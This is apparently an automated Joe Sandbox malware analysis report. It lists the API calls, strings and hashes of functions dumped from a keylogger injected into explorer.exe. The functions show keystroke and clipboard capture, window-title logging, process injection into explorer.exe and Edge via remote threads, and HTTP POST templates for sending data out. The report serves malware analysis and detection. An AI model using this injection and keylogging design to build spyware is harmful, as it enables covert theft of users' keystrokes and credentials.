RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00551155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00551160
Process32First.KERNEL32(00000000,?), ref: 0055117F
CharLowerA.USER32(?), ref: 00551199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 005511B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00551212
Process32Next.KERNEL32(00000000,00000128), ref: 0055126C
CloseHandle.KERNEL32(00000000), ref: 0055127F
Sleep.KERNELBASE(000003E8), ref: 0055129F

Strings

keylog_rules=, xrefs: 0055110D
%s%s, xrefs: 005510E1
|:|, xrefs: 00551125
explorer.exe, xrefs: 005511AB
microsoftedgecp.exe, xrefs: 00551208

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3206029838-2805246637
Opcode ID: 1b6959e098595a20caad2d8d99496696b42a3f80af8b1319e2eab4ef6d65160e
Instruction ID: e2939f5ac73575f5a1cebdf3d30c6f27ad0472fd98cae28142fd3738bfa40b77
Opcode Fuzzy Hash: 1b6959e098595a20caad2d8d99496696b42a3f80af8b1319e2eab4ef6d65160e
Instruction Fuzzy Hash: 4B51B1302047019BC714AF70DCBCA6A7FA9FB95743F00052ABD4A872F1EB249A4D9B61

Function 005510A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13

wsprintfA.USER32 ref: 005510E7

Part of subcall function 0055276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00552777
Part of subcall function 0055276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,005510FE), ref: 00552789

RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00551155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00551160
Process32First.KERNEL32(00000000,?), ref: 0055117F
CharLowerA.USER32(?), ref: 00551199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 005511B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00551212
Process32Next.KERNEL32(00000000,00000128), ref: 0055126C
CloseHandle.KERNEL32(00000000), ref: 0055127F
Sleep.KERNELBASE(000003E8), ref: 0055129F

Strings

keylog_rules=, xrefs: 0055110D
%s%s, xrefs: 005510E1
|:|, xrefs: 00551125
explorer.exe, xrefs: 005511AB
microsoftedgecp.exe, xrefs: 00551208

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3018447944-2805246637
Opcode ID: cbd182b90ecf0db031203a08b423793d34b20721efde2a39be554090702d3f44
Instruction ID: 3b56842651fcc47d7f283433ae5ae5c6c2230f9646649223bb0dec635eb8c57c
Opcode Fuzzy Hash: cbd182b90ecf0db031203a08b423793d34b20721efde2a39be554090702d3f44
Instruction Fuzzy Hash: B141D6302047055BC714AF618CBDA3A7FA9FB95787F00062ABD45832E1EF349E0D9751

Function 00559AE0 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000558000.00000040.80000000.00040000.00000000.sdmp, Offset: 00558000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_558000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99db8da8ea2769c0ee53a94276b3a8c1ef743623185cac298862f4e59f457cfe
Instruction ID: 0dcfabfec9d3dad02d581f3513fe30e7471c00e17a68ca633ac376b3cc4ffe6a
Opcode Fuzzy Hash: 99db8da8ea2769c0ee53a94276b3a8c1ef743623185cac298862f4e59f457cfe
Instruction Fuzzy Hash: F051C771A58252CAE7219A78DCA07A5BF94FB51332B18072ACDE5C72C6E7985C0EC750

Function 0055276D Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00552777
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,005510FE), ref: 00552789

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 4a9ea7d34a8eb6abf3c0502c5d7c0a2ff5992e82784d5b5cc149b8dc18972037
Instruction ID: 9bfd2476d5ab1d77cd589a2653e0b97b07d5e040bdb2dba1133dae6a5c34b17b
Opcode Fuzzy Hash: 4a9ea7d34a8eb6abf3c0502c5d7c0a2ff5992e82784d5b5cc149b8dc18972037
Instruction Fuzzy Hash: D3D01732711331BBE3745A7B6C1CF83AE9DDF96AF2B010025B90DD21A0E6608810C2F0

Function 0055275A Relevance: 3.0, APIs: 2, Instructions: 8
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNEL32(00000000,?,0055129A,00000001), ref: 0055275E
CloseHandle.KERNELBASE(?,?,0055129A,00000001), ref: 00552765

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: CloseFileHandleUnmapView
String ID:
API String ID: 2381555830-0
Opcode ID: 97615d5cab79e2de506513d67baa3b895f9f39f1f44666a94036af2d31988717
Instruction ID: be33d93b5eed15e2166115425b27d02fedcfb1208110d49a193512dd64aa9d8d
Opcode Fuzzy Hash: 97615d5cab79e2de506513d67baa3b895f9f39f1f44666a94036af2d31988717
Instruction Fuzzy Hash: 72B0123340533097C35427347C1C8DB3E18EE592A33050144F10D8207057240B05A6E8

Function 00552A09 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
RtlAllocateHeap.NTDLL(00000000), ref: 00552A13

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: f03836c81669329769b20e79bcf44dcb6e4abde5d19fe6dd51ea5dd8846a9700
Instruction ID: 5a541df433f57693d00c4a9064728ce127d30b9e5516858e186afb7b4a92a15d
Opcode Fuzzy Hash: f03836c81669329769b20e79bcf44dcb6e4abde5d19fe6dd51ea5dd8846a9700
Instruction Fuzzy Hash: D4A002B56503006BDF4557A49D1DF157658A754743F004544724EC50F09D75555CA721

Non-executed Functions

Function 005518BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00552724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,005529F3,-00000001,0055128C), ref: 00552731

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 005518F4
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0055192F
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 005519BF
RtlMoveMemory.NTDLL(00000000,00553638,00000016), ref: 005519E6
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00551A0E
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00551A1E
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00551A38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00551A40
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551A4E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551A55
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00551A6B
GetProcAddress.KERNEL32(00000000), ref: 00551A72
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00551A88
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00551AB2
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00551AC5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551ACC
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551AD3
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00551AE7
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00551AFE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551B0B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551B11
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00551B17
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00551B1A

Strings

atan, xrefs: 00551A61
opera_shared_counter, xrefs: 00551A31
ntdll, xrefs: 00551A66

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$ntdll$opera_shared_counter
API String ID: 1066286714-2737717697
Opcode ID: 976585acce2e767f2cda5236c659f40c4bda385099070ca38aa9e26eae7ca163
Instruction ID: 1ab536d372d8a1bf3c966296061f21b15bc69a1257d47ed6ee3ff4353c0d36bd
Opcode Fuzzy Hash: 976585acce2e767f2cda5236c659f40c4bda385099070ca38aa9e26eae7ca163
Instruction Fuzzy Hash: 15617D71204705AFD310DF64CCA8E6BBFECFB98796F00051AF949932A1D670D908CBA6

Function 00552799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 005527B5
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 005527CD
lstrlen.KERNEL32(?,00000000), ref: 005527D5
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 005527E0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 005527FA
wsprintfA.USER32 ref: 00552811
CryptDestroyHash.ADVAPI32(?), ref: 0055282A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00552834

Strings

%02X, xrefs: 0055280B

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 90e4bae6295b66c000c0940bcf50de8a302a0a4aba46d7e1da11683ef70ce54a
Instruction ID: ef32dcb0cda569ee92b73841b2d664e0f5704c298054f8054268f19cfbf37fbf
Opcode Fuzzy Hash: 90e4bae6295b66c000c0940bcf50de8a302a0a4aba46d7e1da11683ef70ce54a
Instruction Fuzzy Hash: 9B112E71900208BFDB119BA5DC5CEAEBFBCEB48352F5040A5F909E2160E6715F59AB60

Function 0055162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00551652
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0055167A

Strings

, xrefs: 00551699

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: KeyboardStateUnicode
String ID:
API String ID: 3453085656-3916222277
Opcode ID: 9fec1649cc358a32f837e89ffc1a70b4368a7399169221b8ce9051645f99ba72
Instruction ID: b1e8ed52622fceb6536e0f1eca00ee016cce25b1268681febb0f855ce615d0b1
Opcode Fuzzy Hash: 9fec1649cc358a32f837e89ffc1a70b4368a7399169221b8ce9051645f99ba72
Instruction Fuzzy Hash: 3C01A132900A099ADB30CB50D9A5BBB7FBCBF55702F18401BED05A2851D630E9498BA9

Function 005513AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(00555013,0000001C), ref: 005513C8
VirtualQuery.KERNEL32(005513AE,?,0000001C), ref: 005513DA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0055140B
GetCurrentProcessId.KERNEL32(00000004), ref: 0055141C
wsprintfA.USER32 ref: 00551433
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00551448
GetLastError.KERNEL32 ref: 0055144E
RtlInitializeCriticalSection.NTDLL(0055582C), ref: 00551465
Sleep.KERNEL32(000001F4), ref: 00551489
GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 005514A6
GetProcAddress.KERNEL32(00000000), ref: 005514AF
GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 005514D0
GetProcAddress.KERNEL32(00000000), ref: 005514D3
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 005514F1
CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0055150D
CloseHandle.KERNEL32(00000000), ref: 00551514
RtlExitUserThread.NTDLL(00000000), ref: 0055152A

Strings

kernel32.dll, xrefs: 005514EC
%s%d%d%d, xrefs: 0055142D
GetClipboardData, xrefs: 005514C6
TranslateMessage, xrefs: 0055149C
user32.dll, xrefs: 005514A1, 005514CB

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
API String ID: 3628807430-1779906909
Opcode ID: a755b3bc8e1de30c1bab3fd5818d0298baf33f8021ead8730e91bacb296aee0a
Instruction ID: 85239b2be71ae2380f43c1cfe51787102b6aa0d0e0968e977cec904356fe48bb
Opcode Fuzzy Hash: a755b3bc8e1de30c1bab3fd5818d0298baf33f8021ead8730e91bacb296aee0a
Instruction Fuzzy Hash: 7241C670600705ABD710ABA5DC7DE1B3FACFB95793B00401AFD09862A1EB75990C9BA5

Function 005516B9 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(0055582C), ref: 005516C4
lstrlenW.KERNEL32 ref: 005516DB
lstrlenW.KERNEL32 ref: 005516F3
wsprintfW.USER32 ref: 00551743
GetForegroundWindow.USER32 ref: 0055174E
GetWindowTextW.USER32(00000000,00555850,00000800), ref: 00551767
GetClassNameW.USER32(00000000,00555850,00000800), ref: 00551774
lstrcmpW.KERNEL32(00555020,00555850), ref: 00551781
lstrcpyW.KERNEL32(00555020,00555850), ref: 0055178D
wsprintfW.USER32 ref: 005517AD
lstrcatW.KERNEL32 ref: 005517C6
RtlLeaveCriticalSection.NTDLL(0055582C), ref: 005517D3

Strings

PXU, xrefs: 0055175F
%s%s%s%s, xrefs: 005517A2
New Window Caption -> , xrefs: 0055179A
Clipboard -> , xrefs: 00551730
PU, xrefs: 0055177B
%s%s%s, xrefs: 00551738

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
String ID: Clipboard -> $ New Window Caption -> $ PU$%s%s%s$%s%s%s%s$PXU
API String ID: 2651329914-551020702
Opcode ID: b30927d3466e0970ce135d34481a74987fc5e5ed3cb51481ff2cae6f8c23fe9d
Instruction ID: 820c4f1de83a3d73c7cfcf0189fe66df5af69a778ef0ad72eeeb9a0b5d9d7a25
Opcode Fuzzy Hash: b30927d3466e0970ce135d34481a74987fc5e5ed3cb51481ff2cae6f8c23fe9d
Instruction Fuzzy Hash: 6921B630510B04ABC3212779EC7CA2B3F68FB557977140026FC09521B1EA119D0CE7A9

Function 005525F1 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00552603
GetCurrentThreadId.KERNEL32 ref: 0055260B
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0055261B
Thread32First.KERNEL32(00000000,0000001C), ref: 00552629
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00552648
SuspendThread.KERNEL32(00000000), ref: 00552658
CloseHandle.KERNEL32(00000000), ref: 00552667
Thread32Next.KERNEL32(00000000,0000001C), ref: 00552677
CloseHandle.KERNEL32(00000000), ref: 00552682

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: e92e7aa54c283be45d7f69d05523afcc8f64655f8d8d3516e1dd936d72709a6f
Instruction ID: f3df737ba399dd2241854bdfdae64942bfe7dc1bbcd936904709e4d2a5125447
Opcode Fuzzy Hash: e92e7aa54c283be45d7f69d05523afcc8f64655f8d8d3516e1dd936d72709a6f
Instruction Fuzzy Hash: 34118232405300EFD7019F60AC6CA6FBFA4FF55793F04042AF94A921A0D7308A1DABA3

Function 005520A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13

Part of subcall function 0055298A: lstrlen.KERNEL32(00554FE2,?,00000000,00000000,005520DD,74DE8A60,00554FE2,00000000), ref: 00552992
Part of subcall function 0055298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00554FE2,00000001,00000000,00000000), ref: 005529A4

Part of subcall function 005524CC: RtlZeroMemory.NTDLL(?,00000018), ref: 005524DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 00552139
wsprintfW.USER32 ref: 00552272
wsprintfW.USER32 ref: 005522DD
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 005523A7

Strings

Accept: */*Referer: %S, xrefs: 00552268
Content-Type: application/x-www-form-urlencoded, xrefs: 00552301
Host: %s, xrefs: 005522D7
POST, xrefs: 00552223

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 72cf60d5243a2a9bba8996a7fc9a08092dcec3e2b42bfbf477df7347931294f4
Instruction ID: e52f50d1c4b55746595a773670e56afe19ca4369853004f1e05b22bf29a45e1b
Opcode Fuzzy Hash: 72cf60d5243a2a9bba8996a7fc9a08092dcec3e2b42bfbf477df7347931294f4
Instruction Fuzzy Hash: 30A16D71608741AFD7109F68D8A8A2BBBE8FB89741F00082EF989D7351DA74DD08CB52

Function 005524CC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 005524DE

Strings

OU U, xrefs: 005524FF
U, xrefs: 005524F5
OU, xrefs: 00552547
OU, xrefs: 005524F2

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID: U$OU$OU$OU U
API String ID: 816449071-188478793
Opcode ID: 20e1daab5973831c9cd70b61da3f20f5d259a2d939060d49c62a55e9064ef55c
Instruction ID: b0cc191c80610f63005d5bfab17eda84efb14c8aff06234e2363ecbd40f3e1bb
Opcode Fuzzy Hash: 20e1daab5973831c9cd70b61da3f20f5d259a2d939060d49c62a55e9064ef55c
Instruction Fuzzy Hash: 2911FEB1A01209AFDB10DFA9D894ABEBBBCFB49742F100429F945D7240E730DD08DB60

Function 0055182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(0055582C), ref: 00551839
lstrlenW.KERNEL32 ref: 00551845
RtlLeaveCriticalSection.NTDLL(0055582C), ref: 005518A9
Sleep.KERNEL32(00007530), ref: 005518B4

Strings

,XU, xrefs: 00551833

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID: ,XU
API String ID: 2134730579-2809468081
Opcode ID: e31d2850cf18d6bd65ed8047d3313147005f8553b71b544cc616f737de12b8dd
Instruction ID: 466416e3889043d27a92e0c9507d5c52abc5c9b6e0e2f7c45a8cb3c4412a6a57
Opcode Fuzzy Hash: e31d2850cf18d6bd65ed8047d3313147005f8553b71b544cc616f737de12b8dd
Instruction Fuzzy Hash: 28018430510B01ABD32467A5DC7D52E3EA9FB92753B10002AF805862B1EA309D0DABA2

Function 005512AE Relevance: 7.6, APIs: 5, Instructions: 93
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005529BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,005512D9,00000000,00000000,?,00000001), ref: 005529C7

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 005512DC

Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13

PathMatchSpecA.SHLWAPI(?,00000000), ref: 0055138A

Part of subcall function 00552841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00551119,00000001), ref: 00552850
Part of subcall function 00552841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00551119,00000001), ref: 00552855

RtlZeroMemory.NTDLL(00000000,00000104), ref: 00551316
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00551332

Part of subcall function 00552569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0055136E), ref: 00552591
Part of subcall function 00552569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0055259A

RtlMoveMemory.NTDLL(00000000,?,?), ref: 0055135F

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
String ID:
API String ID: 2993730741-0
Opcode ID: c065fef3e07224df19675b364499967e598978f212eb9e8aba4532fc7a726bf0
Instruction ID: 982df5d1b01b870ac92a2cdc3295e202544b357690f2f70cef2b9cd4b8e6c928
Opcode Fuzzy Hash: c065fef3e07224df19675b364499967e598978f212eb9e8aba4532fc7a726bf0
Instruction Fuzzy Hash: 322169707047029B8300AF2898B9A3EBF99BBD4712F11092FBC56D7641DB24E94D8B66

Function 00551581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(00000000), ref: 005515A9
lstrlenW.KERNEL32(00000000), ref: 005515C6
lstrcatW.KERNEL32(00000000,00000000), ref: 005515DC
lstrlenW.KERNEL32(00000000), ref: 00551600
GlobalUnlock.KERNEL32(00000000), ref: 0055161C

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Globallstrlen$LockUnlocklstrcat
String ID:
API String ID: 1114890469-0
Opcode ID: 8a0ffe5c5fc48ed26b328accd6a4aeed2d4e09aed5bd6d20c65d3ae3ee67ea91
Instruction ID: 4e85673e20b26e7c76bc87515b61a24c5476b4da0689644b0bccfa92367be583
Opcode Fuzzy Hash: 8a0ffe5c5fc48ed26b328accd6a4aeed2d4e09aed5bd6d20c65d3ae3ee67ea91
Instruction Fuzzy Hash: 3A01E932A00A015B872567B95CBC77E6EAEBBD6353B080127FC0A92661EE348D0E5658

Function 00551BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00551BF4
LoadLibraryA.KERNEL32(?,00555848,00000000,00000000,74DF2EE0,00000000,005519B6,?,?,?,00000001,?,00000000), ref: 00551C1C
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00551C49
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00551C9A

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: ccd083dd821c4d2d861a5ce5c927461df229816f4d7f130cabdd096ce4b40394
Instruction ID: c8fde1038128b380d6a386bc076f13ea16026ab3e313320b5604bdc98643afc0
Opcode Fuzzy Hash: ccd083dd821c4d2d861a5ce5c927461df229816f4d7f130cabdd096ce4b40394
Instruction Fuzzy Hash: EB31C271640A11ABCB18CF29C9A4B66BFA8BF15316B14452EEC4AC7200D732EC49DBA4

Function 005526C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,005511DD), ref: 005526DB
IsWow64Process.KERNEL32(000000FF,?), ref: 005526ED
IsWow64Process.KERNEL32(00000000,?), ref: 00552700
CloseHandle.KERNEL32(00000000), ref: 00552716

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 14645345394e90a75995924441b82a651fb364d78d7be7356862ca363e07ea2f
Instruction ID: f35fea89086bc5a7c1cf3e1be92f648fe61c6c7cb7318c819fab599c5b917089
